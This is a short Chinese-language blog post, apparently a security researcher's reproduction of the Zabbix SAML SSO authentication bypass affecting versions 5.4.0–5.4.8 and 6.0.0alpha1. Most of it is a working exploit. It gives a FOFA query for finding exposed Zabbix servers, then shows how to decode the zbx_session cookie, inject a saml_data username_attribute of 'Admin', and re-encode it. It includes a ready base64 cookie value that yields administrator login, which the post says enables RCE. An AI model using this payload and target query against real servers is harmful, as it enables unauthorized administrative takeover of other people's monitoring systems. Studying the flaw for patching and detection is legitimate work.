Zabbix SAML SSO认证绕过漏洞
漏洞描述
Zabbix
对客户端提交的Cookie
会话存在不安全的存储方式,导致在启动SAML SSO
认证模式的前提下,恶意用户可通过构造特殊请求绕过认证,获取管理员权限,进而可实现RCE
。
影响范围
5.4.0 - 5.4.8
6.0.0alpha1
漏洞复现
fofa:
1 | app="ZABBIX-监控系统" && body="saml" |
直接请求index_sso.php
路径,抓包获取cookie
字段中的zbx_session
的值
base64
解密该字符串:
1 | {"sessionid":"8ea5e3d2f2cc2bc140446245c211227c","sign":"4abEPmDHy9CPWhinteCeeeYcd3nCnp61hqiGe29Y\/QB\/9DgTBYc2sUZQSAxWitAJ+oI2zY0Pdhcb9oLUcSEg+Q=="} |
修改该字符串内容如下:
1 | {"saml_data": {"username_attribute": "Admin"}, "sessionid":"8ea5e3d2f2cc2bc140446245c211227c","sign":"4abEPmDHy9CPWhinteCeeeYcd3nCnp61hqiGe29Y\/QB\/9DgTBYc2sUZQSAxWitAJ+oI2zY0Pdhcb9oLUcSEg+Q=="} |
将修改后的字符串经过base64
加密处理,添加入zbx_session
中直接放包
1 | eyJzYW1sX2RhdGEiOiB7InVzZXJuYW1lX2F0dHJpYnV0ZSI6ICJBZG1pbiJ9LCAic2Vzc2lvbmlkIjoiOGVhNWUzZDJmMmNjMmJjMTQwNDQ2MjQ1YzIxMTIyN2MiLCJzaWduIjoiNGFiRVBtREh5OUNQV2hpbnRlQ2VlZVljZDNuQ25wNjFocWlHZTI5WVwvUUJcLzlEZ1RCWWMyc1VaUVNBeFdpdEFKK29JMnpZMFBkaGNiOW9MVWNTRWcrUT09In0= |
成功登录后端面板
Zabbix SAML SSO认证绕过漏洞
http://www.greetdawn.top/2022/03/02/安全研究/Zabbix-SAML-SSO认证绕过漏洞/